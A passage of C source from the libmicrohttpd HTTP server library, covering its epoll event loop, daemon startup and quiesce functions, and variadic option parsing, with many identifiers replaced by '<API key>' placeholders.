  /* compute epoll_wait timeout from connection deadlines */
  if (MHD_YES == may_block)
    {
      if (MHD_YES == MHD_get_timeout (daemon,
                                      &timeout_ll))
        {
          if (timeout_ll >= (<API key>) INT_MAX)
            timeout_ms = INT_MAX;
          else
            timeout_ms = (int) timeout_ll;
        }
      else
        timeout_ms = -1; /* no deadline: block indefinitely */
    }
  else
    timeout_ms = 0;
  /* drain 'epoll' event queue; need to iterate as we get at most
     MAX_EVENTS in one system call here; in practice this should
     pretty much mean only one round, but better an extra loop here
     than unfair behavior... */
  num_events = MAX_EVENTS;
  while (MAX_EVENTS == num_events)
    {
      /* update event masks */
      num_events = epoll_wait (daemon->epoll_fd,
                               events, MAX_EVENTS, timeout_ms);
      if (-1 == num_events)
        {
          if (EINTR == MHD_socket_errno_)
            return MHD_YES; /* interrupted by signal: benign */
#if HAVE_MESSAGES
          MHD_DLOG (daemon,
                    "Call to epoll_wait failed: %s\n",
                    <API key> ());
#endif
          return MHD_NO;
        }
      for (i=0;i<(unsigned int) num_events;i++)
        {
          if (NULL == events[i].data.ptr)
            continue; /* shutdown signal! */
          if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
               (daemon->wpipe[0] == events[i].data.fd) )
            {
              /* just drain the wakeup pipe */
              (void)! MHD_pipe_read_ (daemon->wpipe[0], &tmp, sizeof (tmp));
              continue;
            }
          if (daemon != events[i].data.ptr)
            {
              /* this is an event relating to a 'normal' connection,
                 remember the event and if appropriate mark the
                 connection as 'eready'. */
              pos = events[i].data.ptr;
              if (0 != (events[i].events & EPOLLIN))
                {
                  pos->epoll_state |= <API key>;
                  if ( ( (<API key> == pos->event_loop_info) ||
                         (pos->read_buffer_size > pos->read_buffer_offset) ) &&
                       (0 == (pos->epoll_state & <API key>) ) )
                    {
                      /* not yet on the ready list: enqueue it */
                      EDLL_insert (daemon->eready_head,
                                   daemon->eready_tail,
                                   pos);
                      pos->epoll_state |= <API key>;
                    }
                }
              if (0 != (events[i].events & EPOLLOUT))
                {
                  pos->epoll_state |= <API key>;
                  if ( (<API key> == pos->event_loop_info) &&
                       (0 == (pos->epoll_state & <API key>) ) )
                    {
                      EDLL_insert (daemon->eready_head,
                                   daemon->eready_tail,
                                   pos);
                      pos->epoll_state |= <API key>;
                    }
                }
            }
          else /* must be listen socket */
            {
              /* run 'accept' until it fails or we are not allowed to take
                 on more connections; cap the series to stay fair to
                 already-connected clients */
              series_length = 0;
              while ( (MHD_YES == <API key> (daemon)) &&
                      (daemon->connections < daemon->connection_limit) &&
                      (series_length < 128) )
                series_length++;
            }
        }
    }
  /* we handle resumes here because we may have ready connections
     that will not be placed into the epoll list immediately. */
  if (<API key> == (daemon->options & <API key>))
    <API key> (daemon);
  /* process events for connections */
  while (NULL != (pos = daemon->eready_tail))
    {
      EDLL_remove (daemon->eready_head,
                   daemon->eready_tail,
                   pos);
      pos->epoll_state &= ~<API key>;
      if (<API key> == pos->event_loop_info)
        pos->read_handler (pos);
      if (<API key> == pos->event_loop_info)
        pos->write_handler (pos);
      pos->idle_handler (pos);
    }
  /* Finally, handle timed-out connections; we need to do this here
     as the epoll mechanism won't call the 'idle_handler' on everything,
     as the other event loops do.  As timeouts do not get an explicit
     event, we need to find those connections that might have timed out
     here.

     Connections with custom timeouts must all be looked at, as we
     do not bother to sort that (presumably very short) list. */
  next = daemon->manual_timeout_head;
  while (NULL != (pos = next))
    {
      next = pos->nextX;
      pos->idle_handler (pos);
    }
  /* Connections with the default timeout are sorted by prepending
     them to the head of the list whenever we touch the connection;
     thus it suffices to iterate from the tail until the first
     connection is NOT timed out */
  next = daemon->normal_timeout_tail;
  while (NULL != (pos = next))
    {
      next = pos->prevX;
      pos->idle_handler (pos);
      if (<API key> != pos->state)
        break; /* sorted by timeout, no need to visit the rest! */
    }
  return MHD_YES;
}
#endif
/**
 * Run webserver operations (without blocking unless in client
 * callbacks).  This method should be called by clients in combination
 * with #MHD_get_fdset if the client-controlled select method is used.
 *
 * This function is a convenience method, which is useful if the
 * fd_sets from #MHD_get_fdset were not directly passed to `select()`;
 * with this function, MHD will internally do the appropriate `select()`
 * call itself again.  While it is always safe to call #MHD_run (in
 * external select mode), you should call #MHD_run_from_select if
 * performance is important (as it saves an expensive call to
 * `select()`).
 *
 * @param daemon daemon to run
 * @return #MHD_YES on success, #MHD_NO if this
 *         daemon was not started with the right
 *         options for this call.
 * @ingroup event
 */
int
MHD_run (struct MHD_Daemon *daemon)
{
  /* only valid in externally-driven (non-threaded) modes */
  if ( (MHD_YES == daemon->shutdown) ||
       (0 != (daemon->options & <API key>)) ||
       (0 != (daemon->options & <API key>)) )
    return MHD_NO;
  if (0 != (daemon->options & MHD_USE_POLL))
    {
      MHD_poll (daemon, MHD_NO);
      <API key> (daemon);
    }
#if EPOLL_SUPPORT
  else if (0 != (daemon->options & <API key>))
    {
      MHD_epoll (daemon, MHD_NO);
      <API key> (daemon);
    }
#endif
  else
    {
      MHD_select (daemon, MHD_NO);
      /* MHD_select does <API key> already */
    }
  return MHD_YES;
}
/**
 * Thread that runs the select loop until the daemon
 * is explicitly shut down.
 *
 * @param cls 'struct MHD_Daemon' to run select loop in a thread for
 * @return always 0 (on shutdown)
 */
static MHD_THRD_RTRN_TYPE_ MHD_THRD_CALL_SPEC_
MHD_select_thread (void *cls)
{
  struct MHD_Daemon *daemon = (struct MHD_Daemon*) cls;

  while (MHD_YES != daemon->shutdown)
    {
      /* pick the event mechanism configured at daemon startup */
      if (0 != (daemon->options & MHD_USE_POLL))
        MHD_poll (daemon, MHD_YES);
#if EPOLL_SUPPORT
      else if (0 != (daemon->options & <API key>))
        MHD_epoll (daemon, MHD_YES);
#endif
      else
        MHD_select (daemon, MHD_YES);
      <API key> (daemon);
    }
  return (MHD_THRD_RTRN_TYPE_)0;
}
/**
 * Process escape sequences ('%HH').  Updates val in place; the
 * result should be UTF-8 encoded and cannot be larger than the input.
 * The result must also still be 0-terminated.
 *
 * Thin adapter matching the UnescapeCallback signature around
 * #MHD_http_unescape; the closure and connection arguments are unused.
 *
 * @param cls closure (use NULL)
 * @param connection handle to connection, not used
 * @param val value to unescape (modified in the process)
 * @return length of the resulting val (strlen(val) maybe
 *  shorter afterwards due to elimination of escape sequences)
 */
static size_t
unescape_wrapper (void * /*cls*/,
                  struct MHD_Connection * /*connection*/,
                  char *val)
{
  size_t unescaped_len = MHD_http_unescape (val);
  return unescaped_len;
}
/**
 * Start a webserver on the given port.  Variadic version of
 * #MHD_start_daemon_va.
 *
 * @param flags combination of `enum MHD_FLAG` values
 * @param port port to bind to
 * @param apc callback to call to check which clients
 *        will be allowed to connect; you can pass NULL
 *        in which case connections from any IP will be
 *        accepted
 * @param apc_cls extra argument to @a apc
 * @param dh handler called for all requests (repeatedly)
 * @param dh_cls extra argument to @a dh
 * @return NULL on error, handle to daemon on success
 * @ingroup event
 */
struct MHD_Daemon *
MHD_start_daemon (unsigned int flags,
                  uint16_t port,
                  <API key> apc,
                  void *apc_cls,
                  <API key> dh, void *dh_cls, ...)
{
  struct MHD_Daemon *daemon;
  va_list ap;

  /* collect the trailing option list and forward to the va_list variant */
  va_start (ap, dh_cls);
  daemon = MHD_start_daemon_va (flags, port, apc, apc_cls, dh, dh_cls, ap);
  va_end (ap);
  return daemon;
}
/**
 * Stop accepting connections from the listening socket.  Allows
 * clients to continue processing, but stops accepting new
 * connections.  Note that the caller is responsible for closing the
 * returned socket; however, if MHD is run using threads (anything but
 * external select mode), it must not be closed until AFTER
 * #MHD_stop_daemon has been called (as it is theoretically possible
 * that an existing thread is still using it).
 *
 * Note that some thread modes require the caller to have passed
 * #<API key> when using this API.  If this daemon is
 * in one of those modes and this option was not given to
 * #MHD_start_daemon, this function will return #MHD_INVALID_SOCKET.
 *
 * @param daemon daemon to stop accepting new connections for
 * @return old listen socket on success, #MHD_INVALID_SOCKET if
 *         the daemon was already not listening anymore
 * @ingroup specialized
 */
MHD_socket
MHD_quiesce_daemon (struct MHD_Daemon *daemon)
{
  unsigned int i;
  MHD_socket ret;

  ret = daemon->socket_fd;
  if (MHD_INVALID_SOCKET == ret)
    return MHD_INVALID_SOCKET;
  /* threaded modes need the wakeup pipe to interrupt blocked loops */
  if ( (MHD_INVALID_PIPE_ == daemon->wpipe[1]) &&
       (0 != (daemon->options & (<API key> | <API key>))) )
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Using MHD_quiesce_daemon in this mode requires <API key>\n");
#endif
      return MHD_INVALID_SOCKET;
    }
  /* detach the listen socket from every worker first */
  if (NULL != daemon->worker_pool)
    for (i = 0; i < daemon->worker_pool_size; i++)
      {
        daemon->worker_pool[i].socket_fd = MHD_INVALID_SOCKET;
        if (MHD_INVALID_PIPE_ != daemon->worker_pool[i].wpipe[1])
          (void)! MHD_pipe_write_ (daemon->worker_pool[i].wpipe[1], "q", 1);
#if EPOLL_SUPPORT
        if ( (0 != (daemon->options & <API key>)) &&
             (-1 != daemon->worker_pool[i].epoll_fd) &&
             (MHD_YES == daemon->worker_pool[i].<API key>) )
          {
            if (0 != epoll_ctl (daemon->worker_pool[i].epoll_fd,
                                EPOLL_CTL_DEL,
                                ret,
                                NULL))
              MHD_PANIC ("Failed to remove listen FD from epoll set\n");
            daemon->worker_pool[i].<API key> = MHD_NO;
          }
#endif
      }
  /* then detach from the master daemon and wake its loop */
  daemon->socket_fd = MHD_INVALID_SOCKET;
  if (MHD_INVALID_PIPE_ != daemon->wpipe[1])
    (void)! MHD_pipe_write_ (daemon->wpipe[1], "q", 1);
#if EPOLL_SUPPORT
  if ( (0 != (daemon->options & <API key>)) &&
       (-1 != daemon->epoll_fd) &&
       (MHD_YES == daemon-><API key>) )
    {
      if (0 != epoll_ctl (daemon->epoll_fd,
                          EPOLL_CTL_DEL,
                          ret,
                          NULL))
        MHD_PANIC ("Failed to remove listen FD from epoll set\n");
      daemon-><API key> = MHD_NO;
    }
#endif
  return ret;
}
/**
 * Signature of the MHD custom logger function.
 * Mirrors `vfprintf`: returns the number of characters written
 * (negative on error).
 *
 * @param cls closure
 * @param format format string
 * @param va arguments to the format string (fprintf-style)
 */
typedef int (*<API key>)(void *cls,
                         const char *format,
                         va_list va);
/**
 * Parse a list of options given as varargs.
 * (Forward declaration; needed because parse_options and
 * parse_options_va call each other.)
 *
 * @param daemon the daemon to initialize
 * @param servaddr where to store the server's listen address
 * @param ap the options
 * @return #MHD_YES on success, #MHD_NO on error
 */
static int
parse_options_va (struct MHD_Daemon *daemon,
                  const struct sockaddr **servaddr,
                  va_list ap);
/**
 * Parse a list of options given as varargs.
 *
 * @param daemon the daemon to initialize
 * @param servaddr where to store the server's listen address
 * @param ... the options (type-value pairs, terminated
 *        with #MHD_OPTION_END)
 * @return #MHD_YES on success, #MHD_NO on error
 */
static int
parse_options (struct MHD_Daemon *daemon,
               const struct sockaddr **servaddr,
               ...)
{
  va_list ap;
  int ret;

  /* collect trailing arguments and delegate to the va_list worker */
  va_start (ap, servaddr);
  ret = parse_options_va (daemon, servaddr, ap);
  va_end (ap);
  return ret;
}
/**
 * Parse a list of options given as varargs.
 * Options are (option-code, value...) pairs; most take one value,
 * some take two (callback + closure).  #MHD_OPTION_ARRAY entries are
 * expanded by recursively calling parse_options() per array item.
 *
 * @param daemon the daemon to initialize
 * @param servaddr where to store the server's listen address
 * @param ap the options
 * @return #MHD_YES on success, #MHD_NO on error
 */
static int
parse_options_va (struct MHD_Daemon *daemon,
                  const struct sockaddr **servaddr,
                  va_list ap)
{
  enum MHD_OPTION opt;
  struct MHD_OptionItem *oa;
  unsigned int i;
#if HTTPS_SUPPORT
  int ret;
  const char *pstr;
#endif

  while (MHD_OPTION_END != (opt = (enum MHD_OPTION) va_arg (ap, int)))
    {
      switch (opt)
        {
        case <API key>:
          daemon->pool_size = va_arg (ap, size_t);
          break;
        case <API key>:
          daemon->pool_increment= va_arg (ap, size_t);
          break;
        case <API key>:
          daemon->connection_limit = va_arg (ap, unsigned int);
          break;
        case <API key>:
          daemon->connection_timeout = va_arg (ap, unsigned int);
          break;
        case <API key>:
          /* callback + closure pair */
          daemon->notify_completed =
            va_arg (ap, <API key>);
          daemon-><API key> = va_arg (ap, void *);
          break;
        case <API key>:
          daemon-><API key> = va_arg (ap, unsigned int);
          break;
        case <API key>:
          *servaddr = va_arg (ap, const struct sockaddr *);
          break;
        case <API key>:
          /* callback + closure pair */
          daemon->uri_log_callback =
            va_arg (ap, LogCallback);
          daemon-><API key> = va_arg (ap, void *);
          break;
        case <API key>:
          daemon->worker_pool_size = va_arg (ap, unsigned int);
          /* guard against overflow when allocating the worker array */
          if (daemon->worker_pool_size >= (UINT_MAX / sizeof (struct MHD_Daemon)))
            {
#if HAVE_MESSAGES
              MHD_DLOG (daemon,
                        "Specified thread pool size (%u) too big\n",
                        daemon->worker_pool_size);
#endif
              return MHD_NO;
            }
          break;
#if HTTPS_SUPPORT
        case <API key>:
          if (0 != (daemon->options & MHD_USE_SSL))
            daemon->https_mem_key = va_arg (ap, const char *);
#if HAVE_MESSAGES
          else
            MHD_DLOG (daemon,
                      "MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
                      opt);
#endif
          break;
        case <API key>:
          if (0 != (daemon->options & MHD_USE_SSL))
            daemon->https_mem_cert = va_arg (ap, const char *);
#if HAVE_MESSAGES
          else
            MHD_DLOG (daemon,
                      "MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
                      opt);
#endif
          break;
        case <API key>:
          if (0 != (daemon->options & MHD_USE_SSL))
            daemon->https_mem_trust = va_arg (ap, const char *);
#if HAVE_MESSAGES
          else
            MHD_DLOG (daemon,
                      "MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
                      opt);
#endif
          break;
        case <API key>:
          daemon->cred_type = (<API key>) va_arg (ap, int);
          break;
        case <API key>:
          /* Diffie-Hellman parameters, given in PEM format */
          if (0 != (daemon->options & MHD_USE_SSL))
            {
              const char *arg = va_arg (ap, const char *);
              gnutls_datum_t dhpar;

              if (<API key> (&daemon->https_mem_dhparams) < 0)
                {
#if HAVE_MESSAGES
                  MHD_DLOG(daemon,
                           "Error initializing DH parameters\n");
#endif
                  return MHD_NO;
                }
              dhpar.data = (unsigned char *) arg;
              dhpar.size = strlen (arg);
              if (<API key> (daemon->https_mem_dhparams, &dhpar,
                             GNUTLS_X509_FMT_PEM) < 0)
                {
#if HAVE_MESSAGES
                  MHD_DLOG(daemon,
                           "Bad Diffie-Hellman parameters format\n");
#endif
                  /* release the half-initialized parameters on failure */
                  <API key> (daemon->https_mem_dhparams);
                  return MHD_NO;
                }
              daemon->have_dhparams = MHD_YES;
            }
          else
            {
#if HAVE_MESSAGES
              MHD_DLOG (daemon,
                        "MHD HTTPS option %d passed to MHD but MHD_USE_SSL not set\n",
                        opt);
#endif
              return MHD_NO;
            }
          break;
        case <API key>:
          /* TLS priority string; replaces any default priority cache */
          if (0 != (daemon->options & MHD_USE_SSL))
            {
              <API key> (daemon->priority_cache);
              ret = <API key> (&daemon->priority_cache,
                               pstr = va_arg (ap, const char*),
                               NULL);
              if (GNUTLS_E_SUCCESS != ret)
                {
#if HAVE_MESSAGES
                  MHD_DLOG (daemon,
                            "Setting priorities to `%s' failed: %s\n",
                            pstr,
                            gnutls_strerror (ret));
#endif
                  daemon->priority_cache = NULL;
                  return MHD_NO;
                }
            }
          break;
        case <API key>:
#if <API key> < 3
#if HAVE_MESSAGES
          MHD_DLOG (daemon,
                    "<API key> requires building MHD with GnuTLS >= 3.0\n");
#endif
          return MHD_NO;
#else
          if (0 != (daemon->options & MHD_USE_SSL))
            daemon->cert_callback = va_arg (ap, <API key> *);
          break;
#endif
#endif
#ifdef DAUTH_SUPPORT
        case <API key>:
          /* size followed by pointer to random data */
          daemon-><API key> = va_arg (ap, size_t);
          daemon->digest_auth_random = va_arg (ap, const char *);
          break;
        case <API key>:
          daemon->nonce_nc_size = va_arg (ap, unsigned int);
          break;
#endif
        case <API key>:
          daemon->socket_fd = va_arg (ap, MHD_socket);
          break;
        case <API key>:
          /* logger callback + closure; consume args even when
             messages are compiled out to keep the va_list in sync */
#if HAVE_MESSAGES
          daemon->custom_error_log =
            va_arg (ap, <API key>);
          daemon-><API key> = va_arg (ap, void *);
#else
          va_arg (ap, <API key>);
          va_arg (ap, void *);
#endif
          break;
        case <API key>:
          daemon->thread_stack_size = va_arg (ap, size_t);
          break;
#ifdef TCP_FASTOPEN
        case <API key>:
          daemon->fastopen_queue_size = va_arg (ap, unsigned int);
          break;
#endif
        case <API key>:
          /* tri-state stored as 1 / -1 */
          daemon-><API key> = va_arg (ap, unsigned int) ? 1 : -1;
          break;
        case MHD_OPTION_ARRAY:
          /* expand array entries by re-dispatching each one
             through parse_options() with a matching value shape */
          oa = va_arg (ap, struct MHD_OptionItem*);
          i = 0;
          while (MHD_OPTION_END != (opt = oa[i].option))
            {
              switch (opt)
                {
                  /* all options taking 'size_t' */
                case <API key>:
                case <API key>:
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (size_t) oa[i].value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* all options taking 'unsigned int' */
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (unsigned int) oa[i].value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* all options taking 'enum' */
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (int) oa[i].value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* all options taking 'MHD_socket' */
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (MHD_socket) oa[i].value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* all options taking one pointer */
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                case MHD_OPTION_ARRAY:
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                oa[i].ptr_value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* all options taking two pointers */
                case <API key>:
                case <API key>:
                case <API key>:
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (void *) oa[i].value,
                                                oa[i].ptr_value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                  /* options taking size_t-number followed by pointer */
                case <API key>:
                  if (MHD_YES != parse_options (daemon,
                                                servaddr,
                                                opt,
                                                (size_t) oa[i].value,
                                                oa[i].ptr_value,
                                                MHD_OPTION_END))
                    return MHD_NO;
                  break;
                default:
                  return MHD_NO;
                }
              i++;
            }
          break;
        case <API key>:
          /* callback + closure pair */
          daemon->unescape_callback =
            va_arg (ap, UnescapeCallback);
          daemon-><API key> = va_arg (ap, void *);
          break;
        default:
#if HAVE_MESSAGES
          if (((opt >= <API key>) &&
               (opt <= <API key>)) || (opt == <API key>))
            {
              MHD_DLOG (daemon,
                        "MHD HTTPS option %d passed to MHD compiled without HTTPS support\n",
                        opt);
            }
          else
            {
              MHD_DLOG (daemon,
                        "Invalid option %d! (Did you terminate the list with MHD_OPTION_END?)\n",
                        opt);
            }
#endif
          return MHD_NO;
        }
    }
  return MHD_YES;
}
/**
 * Create a listen socket, if possible with SOCK_CLOEXEC flag set.
 *
 * @param daemon daemon for which we create the socket
 * @param domain socket domain (i.e. PF_INET)
 * @param type socket type (usually SOCK_STREAM)
 * @param protocol desired protocol, 0 for default
 * @return new socket, or #MHD_INVALID_SOCKET on failure
 */
static MHD_socket
create_socket (struct MHD_Daemon *daemon,
               int domain, int type, int protocol)
{
  int ctype = type | SOCK_CLOEXEC;
  MHD_socket fd;

  /* use SOCK_STREAM rather than ai_socktype: some getaddrinfo
   * implementations do not set ai_socktype, e.g. RHL6.2. */
  fd = socket (domain, ctype, protocol);
  if ( (MHD_INVALID_SOCKET == fd) && (EINVAL == MHD_socket_errno_) && (0 != SOCK_CLOEXEC) )
    {
      /* kernel too old for SOCK_CLOEXEC: retry without the flag */
      ctype = type;
      fd = socket(domain, type, protocol);
    }
  if (MHD_INVALID_SOCKET == fd)
    return MHD_INVALID_SOCKET;
  /* if CLOEXEC could not be set atomically above, set it now */
  if (type == ctype)
    <API key> (daemon, fd);
  return fd;
}
#if EPOLL_SUPPORT
/**
 * Setup epoll() FD for the daemon and initialize it to listen
 * on the listen FD (and the wakeup pipe, when applicable).
 *
 * @param daemon daemon to initialize for epoll()
 * @return #MHD_YES on success, #MHD_NO on failure
 */
static int
<API key> (struct MHD_Daemon *daemon)
{
  struct epoll_event event;

  daemon->epoll_fd = epoll_create1 (EPOLL_CLOEXEC);
  if (-1 == daemon->epoll_fd)
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Call to epoll_create1 failed: %s\n",
                <API key> ());
#endif
      return MHD_NO;
    }
  /* if EPOLL_CLOEXEC is unsupported (0), mark the FD manually */
  if (0 == EPOLL_CLOEXEC)
    <API key> (daemon,
               daemon->epoll_fd);
  if (MHD_INVALID_SOCKET == daemon->socket_fd)
    return MHD_YES; /* non-listening daemon */
  /* register the listen socket */
  event.events = EPOLLIN;
  event.data.ptr = daemon;
  if (0 != epoll_ctl (daemon->epoll_fd,
                      EPOLL_CTL_ADD,
                      daemon->socket_fd,
                      &event))
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Call to epoll_ctl failed: %s\n",
                <API key> ());
#endif
      return MHD_NO;
    }
  /* register the wakeup pipe (edge-triggered; data.ptr == NULL
     marks it as the shutdown/wakeup signal) */
  if ( (MHD_INVALID_PIPE_ != daemon->wpipe[0]) &&
       (<API key> == (daemon->options & <API key>)) )
    {
      event.events = EPOLLIN | EPOLLET;
      event.data.ptr = NULL;
      event.data.fd = daemon->wpipe[0];
      if (0 != epoll_ctl (daemon->epoll_fd,
                          EPOLL_CTL_ADD,
                          daemon->wpipe[0],
                          &event))
        {
#if HAVE_MESSAGES
          MHD_DLOG (daemon,
                    "Call to epoll_ctl failed: %s\n",
                    <API key> ());
#endif
          return MHD_NO;
        }
    }
  daemon-><API key> = MHD_YES;
  return MHD_YES;
}
#endif
/**
 * Start a webserver on the given port.
 *
 * @param flags combination of `enum MHD_FLAG` values
 * @param port port to bind to (in host byte order)
 * @param apc callback to call to check which clients
 *        will be allowed to connect; you can pass NULL
 *        in which case connections from any IP will be
 *        accepted
 * @param apc_cls extra argument to @a apc
 * @param dh handler called for all requests (repeatedly)
 * @param dh_cls extra argument to @a dh
 * @param ap list of options (type-value pairs,
 *        terminated with #MHD_OPTION_END).
 * @return NULL on error, handle to daemon on success
 * @ingroup event
 */
struct MHD_Daemon *
MHD_start_daemon_va (unsigned int flags,
                     uint16_t port,
                     <API key> apc,
                     void *apc_cls,
                     <API key> dh, void *dh_cls,
                     va_list ap)
{
  const int on = 1;
  struct MHD_Daemon *daemon;
  MHD_socket socket_fd;
  struct sockaddr_in servaddr4;
#if HAVE_INET6
  struct sockaddr_in6 servaddr6;
#endif
  const struct sockaddr *servaddr = NULL;
  socklen_t addrlen;
  unsigned int i;
  int res_thread_create;
  int use_pipe;

  /* Reject flags this particular build cannot honor. */
#ifndef HAVE_INET6
  if (0 != (flags & MHD_USE_IPv6))
    return NULL;
#endif
#ifndef HAVE_POLL_H
  if (0 != (flags & MHD_USE_POLL))
    return NULL;
#endif
#if ! HTTPS_SUPPORT
  if (0 != (flags & MHD_USE_SSL))
    return NULL;
#endif
#ifndef TCP_FASTOPEN
  if (0 != (flags & <API key>))
    return NULL;
#endif
  if (NULL == dh)
    return NULL;
  if (NULL == (daemon = (struct MHD_Daemon*) malloc (sizeof (struct MHD_Daemon))))
    return NULL;
  memset (daemon, 0, sizeof (struct MHD_Daemon));
#if EPOLL_SUPPORT
  daemon->epoll_fd = -1;
#endif
  /* try to open listen socket */
#if HTTPS_SUPPORT
  if (0 != (flags & MHD_USE_SSL))
  {
    <API key> (&daemon->priority_cache,
               "NORMAL",
               NULL);
  }
#endif
  /* Fill in defaults; the options parsed below may override these. */
  daemon->socket_fd = MHD_INVALID_SOCKET;
  daemon-><API key> = 0;
  daemon->options = (enum MHD_OPTION) flags;
  daemon->port = port;
  daemon->apc = apc;
  daemon->apc_cls = apc_cls;
  daemon->default_handler = dh;
  daemon->default_handler_cls = dh_cls;
  daemon->connections = 0;
  daemon->connection_limit = <API key>;
  daemon->pool_size = <API key>;
  daemon->pool_increment = MHD_BUF_INC_SIZE;
  daemon->unescape_callback = &unescape_wrapper;
  daemon->connection_timeout = 0; /* no timeout */
  daemon->wpipe[0] = MHD_INVALID_PIPE_;
  daemon->wpipe[1] = MHD_INVALID_PIPE_;
#if HAVE_MESSAGES
  daemon->custom_error_log = (MHD_LogCallback) &vfprintf;
  daemon-><API key> = stderr;
#endif
  /* Decide whether a control pipe is needed for shutdown signalling. */
#ifdef <API key>
  use_pipe = (0 != (daemon->options & (<API key> | <API key>)));
#else
  use_pipe = 1; /* yes, must use pipe to signal shutdown */
#endif
  if (0 == (flags & (<API key> | <API key>)))
    use_pipe = 0; /* useless if we are using 'external' select */
  if ( (use_pipe) && (0 != MHD_pipe_ (daemon->wpipe)) )
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Failed to create control pipe: %s\n",
              MHD_strerror_ (errno));
#endif
    free (daemon);
    return NULL;
  }
#ifndef WINDOWS
  /* select()-based operation cannot watch FDs >= FD_SETSIZE. */
  if ( (0 == (flags & MHD_USE_POLL)) &&
       (1 == use_pipe) &&
       (daemon->wpipe[0] >= FD_SETSIZE) )
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "file descriptor for control pipe exceeds maximum value\n");
#endif
    if (0 != MHD_pipe_close_ (daemon->wpipe[0]))
      MHD_PANIC ("close failed\n");
    if (0 != MHD_pipe_close_ (daemon->wpipe[1]))
      MHD_PANIC ("close failed\n");
    free (daemon);
    return NULL;
  }
#endif
#ifdef DAUTH_SUPPORT
  daemon-><API key> = 0;
  daemon->digest_auth_random = NULL;
  daemon->nonce_nc_size = 4; /* tiny */
#endif
#if HTTPS_SUPPORT
  if (0 != (flags & MHD_USE_SSL))
  {
    daemon->cred_type = <API key>;
  }
#endif
  /* Apply user-supplied options; may also provide a pre-bound socket
     or a sockaddr to bind to. */
  if (MHD_YES != parse_options_va (daemon, &servaddr, ap))
  {
#if HTTPS_SUPPORT
    if ( (0 != (flags & MHD_USE_SSL)) &&
         (NULL != daemon->priority_cache) )
      <API key> (daemon->priority_cache);
#endif
    free (daemon);
    return NULL;
  }
#ifdef DAUTH_SUPPORT
  if (daemon->nonce_nc_size > 0)
  {
    /* Multiplication-overflow check for the allocation below. */
    if ( ( (size_t) (daemon->nonce_nc_size * sizeof (struct MHD_NonceNc))) /
         sizeof(struct MHD_NonceNc) != daemon->nonce_nc_size)
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Specified value for NC_SIZE too large\n");
#endif
#if HTTPS_SUPPORT
      if (0 != (flags & MHD_USE_SSL))
        <API key> (daemon->priority_cache);
#endif
      free (daemon);
      return NULL;
    }
    daemon->nnc = (struct MHD_NonceNc*) malloc (daemon->nonce_nc_size * sizeof (struct MHD_NonceNc));
    if (NULL == daemon->nnc)
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Failed to allocate memory for nonce-nc map: %s\n",
                MHD_strerror_ (errno));
#endif
#if HTTPS_SUPPORT
      if (0 != (flags & MHD_USE_SSL))
        <API key> (daemon->priority_cache);
#endif
      free (daemon);
      return NULL;
    }
  }
  if (MHD_YES != MHD_mutex_create_ (&daemon->nnc_lock))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "MHD failed to initialize nonce-nc mutex\n");
#endif
#if HTTPS_SUPPORT
    if (0 != (flags & MHD_USE_SSL))
      <API key> (daemon->priority_cache);
#endif
    free (daemon->nnc);
    free (daemon);
    return NULL;
  }
#endif
  /* Thread pooling currently works only with internal select thread model */
  if ( (0 == (flags & <API key>)) &&
       (daemon->worker_pool_size > 0) )
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "MHD thread pooling only works with <API key>\n");
#endif
    goto free_and_fail;
  }
  if ( (<API key> == (flags & <API key>)) &&
       (0 != (flags & <API key>)) )
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Combining <API key> and <API key> is not supported.\n");
#endif
    goto free_and_fail;
  }
#ifdef __SYMBIAN32__
  if (0 != (flags & (<API key> | <API key>)))
  {
#if HAVE_MESSAGES
    MHD_DLOG (daemon,
              "Threaded operations are not supported on Symbian.\n");
#endif
    goto free_and_fail;
  }
#endif
  if ( (MHD_INVALID_SOCKET == daemon->socket_fd) &&
       (0 == (daemon->options & <API key>)) )
  {
    /* try to open listen socket */
    if (0 != (flags & MHD_USE_IPv6))
      socket_fd = create_socket (daemon,
                                 PF_INET6, SOCK_STREAM, 0);
    else
      socket_fd = create_socket (daemon,
                                 PF_INET, SOCK_STREAM, 0);
    if (MHD_INVALID_SOCKET == socket_fd)
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Call to socket failed: %s\n",
                <API key> ());
#endif
      goto free_and_fail;
    }
    /* Apply the socket options according to <API key>. */
    if (0 == daemon-><API key>)
    {
      /* No user requirement, use "traditional" default SO_REUSEADDR,
         and do not fail if it doesn't work */
      if (0 > setsockopt (socket_fd,
                          SOL_SOCKET,
                          SO_REUSEADDR,
#if WINDOWS
                          (const char*)&on, sizeof (on)))
#else
                          (void*)&on, sizeof (on)))
#endif
      {
#if HAVE_MESSAGES
